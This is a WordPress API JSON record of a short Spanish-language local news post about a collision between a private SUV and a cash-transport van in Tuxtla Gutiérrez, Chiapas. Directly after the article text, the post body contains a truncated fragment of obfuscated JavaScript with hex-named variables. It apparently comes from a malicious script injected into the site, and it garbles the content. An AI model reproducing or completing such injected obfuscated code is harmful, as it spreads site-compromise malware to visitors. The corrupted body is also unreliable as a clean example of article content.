{"id":10895,"date":"2023-07-08T04:35:38","date_gmt":"2023-07-08T04:35:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10895"},"modified":"2023-07-08T04:35:39","modified_gmt":"2023-07-08T04:35:39","slug":"choca-particular-y-camioneta-de-traslado-de-valores","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10895","title":{"rendered":"Choca particular y camioneta de traslado de valores"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688790806939-1024x768.jpg\" alt=\"\" class=\"wp-image-10896\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688790806939-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688790806939-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688790806939-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688790806939.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 7 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este viernes un choque entre una unidad particular y una unidad de traslado de valores dej\u00f3 cuantiosos da\u00f1os materiales.De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando una camioneta negra VW tipo Tiguan se impact\u00f3 contra  la unidad de la empresa Cometra, a la altura de la Cuarta Norte, esquina 18 Oriente del Fraccionamiento Santos.Los ocupantes del Cometra dieron a conocer que, mientras estaban estacionados \u00fanicamente sintieron un golpe y vieron la unidad pasar.La conductora de la unidad, dijo a los elementos que el cami\u00f3n estaba mal estacionado y no pudo esquivarlo.A pesar de lo aparatoso del accidente no hubo accidentes y en el lugar ambas partes llegaron a un acuerdo para evitar problemas econ\u00f3micos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 7 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este viernes un choque entre una unidad particular y una unidad de traslado de valores dej\u00f3 cuantiosos da\u00f1os materiales.De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando una camioneta negra VW tipo Tiguan se impact\u00f3 contra la unidad de la empresa Cometra, a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10896,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10895","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10895"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10895\/revisions"}],"predecessor-version":[{"id":10897,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10895\/revisions\/10897"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10896"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}